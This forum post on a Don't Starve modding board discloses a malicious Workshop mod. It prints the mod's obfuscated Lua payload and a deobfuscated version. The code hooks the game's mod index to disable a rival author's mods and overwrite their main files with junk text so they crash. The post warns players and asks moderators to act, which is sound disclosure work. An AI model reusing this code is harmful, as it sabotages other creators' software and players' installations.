Jump to content
[Klei Publishing] U.V.S. Nirmana - Out Now!

Malicious Mod Modifies Game Files

_zwb

By _zwb,
in [Don't Starve] Mods and tools

 Share

Recommended Posts

_zwb

_zwb

Posted
Posted

Steam user DYC put malicious and obfuscated code in their mods that would modify modindex.lua file, adding the following line at the end of the file: 

 local wtxt12 = function(p, txt)      local fo = io.open      local f, err = fo(p, "w" )      if err then      else          f:write(txt)          f:close()      end  end  local key1 = "\121\105\121\117" local key2 = "\231\191\188\232\175\173" local sbwss={ "642704851", "701574438", "834039799", "845740921", "1088165487", "1161719409", "1546144229", "1559975778", "1626938843", "1656314475", "1656333678", "1883082987",  "2199037549203167410", "2199037549203167802", "2199037549203167776", "2199037549203167775", "2199037549203168585", } local sbstr = "\229\155\160\230\129\182\230\132\143\231\175\161\230\148\185\228\187\150\228\186\186\109\111\100\232\162\171\229\176\129\231\166\129\239\188\140\230\138\181\229\136\182\115\98\228\189\156\232\128\133\239\188\129" local CheckSB = function (name) if name and (string.find(string.lower(name), key1 , 1, true) or string.find(string.lower(name), key2 , 1, true)) then return true end for k,v in pairs(sbwss) do if name and name=="workshop-"..v then return true end end return false end local AntiSB = function (name) local file1 = "../mods/"..name.."/modmain.lua" local file2 = "../mods/"..name.."/modworldgenmain.lua" wtxt12(file1, sbstr ) wtxt12(file2, sbstr ) end  if _G.KnownModIndex and _G.KnownModIndex.GetModInfo then      local OldFn = KnownModIndex.GetModInfo      KnownModIndex.GetModInfo = function( self, modname, ...)  local info=self.savedata.known_mods[modname] and self.savedata.known_mods[modname].modinfo or {} if CheckSB(info.name) or CheckSB(info.author) then KnownModIndex:DisableBecauseBad(modname) AntiSB(modname) info.restart_required=false return info else return OldFn( self, modname, ...)  end     end  end

Once deobfuscated, it reads: 

local wtxt12 = function(p, txt)
    local fo = io.open
    local f, err = fo(p, "w")
    if err then
    else
        f:write(txt)
        f:close()
    end
end
local key1 = "\121\105\121\117" -- yiyu
local key2 = "\231\191\188\232\175\173" -- 翼语
local sbwss = {
    "642704851",
    "701574438",
    "834039799",
    "845740921",
    "1088165487",
    "1161719409",
    "1546144229",
    "1559975778",
    "1626938843",
    "1656314475",
    "1656333678",
    "1883082987",
    "2199037549203167410",
    "2199037549203167802",
    "2199037549203167776",
    "2199037549203167775",
    "2199037549203168585"
}
local sbstr =
    "\229\155\160\230\129\182\230\132\143\231\175\161\230\148\185\228\187\150\228\186\186\109\111\100\232\162\171\229\176\129\231\166\129\239\188\140\230\138\181\229\136\182\115\98\228\189\156\232\128\133\239\188\129" -- foul langauge
local CheckSB = function(name)
    if name and (string.find(string.lower(name), key1, 1, true) or string.find(string.lower(name), key2, 1, true)) then
        return true
    end
    for k, v in pairs(sbwss) do
        if name and name == "workshop-" .. v then
            return true
        end
    end
    return false
end
local AntiSB = function(name)
    local file1 = "../mods/" .. name .. "/modmain.lua"
    local file2 = "../mods/" .. name .. "/modworldgenmain.lua"
    wtxt12(file1, sbstr)
    wtxt12(file2, sbstr)
end
if _G.KnownModIndex and _G.KnownModIndex.GetModInfo then
    local OldFn = KnownModIndex.GetModInfo
    KnownModIndex.GetModInfo = function(self, modname, ...)
        local info = self.savedata.known_mods[modname] and self.savedata.known_mods[modname].modinfo or {}
        if CheckSB(info.name) or CheckSB(info.author) then
            KnownModIndex:DisableBecauseBad(modname)
            AntiSB(modname)
            info.restart_required = false
            return info
        else
            return OldFn(self, modname, ...)
        end
    end
end

Essentially, this script attacks mods made by another steam user Yiyu(翼语), where sbwss are the workshop item ids of their mods. It modifies files of said mod, causing it to crash. 

 Enabling any of these mods will inject your modindex.lua file with malicious code:

 

@JoeWPlease enforce the workshop rules, this happened ages ago yet is still unresolved, it's not like it wasn't known at the time so... please do something:concern:

 

Note, Yiyu is not innocent here, apparently they also made some malicious code but I can't be bothered to look up more obfuscated code filled with foul language, so that's someone else's job

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...